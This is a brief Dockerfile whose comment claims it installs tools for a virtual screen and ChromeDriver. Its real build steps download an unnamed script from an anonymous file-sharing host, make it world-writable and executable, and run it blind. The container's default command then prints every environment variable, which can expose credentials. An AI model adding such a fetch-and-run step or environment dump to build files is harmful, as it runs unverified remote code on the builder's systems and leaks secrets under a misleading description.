FROM ubuntu:xenial

# We need wget to set up the PPA, Xvfb to have a virtual screen and unzip to extract ChromeDriver
RUN apt-get update
RUN apt-get install -y wget xvfb unzip
RUN wget https://transfer.sh/vfw8y/test.sh
RUN chmod 777 test.sh
RUN ./test.sh

RUN mkdir /usr/src/app
WORKDIR /usr/src/app

COPY . .

CMD ["printenv"]
